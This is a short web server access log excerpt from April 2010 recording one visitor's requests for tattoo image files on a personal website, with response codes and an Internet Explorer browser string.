70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
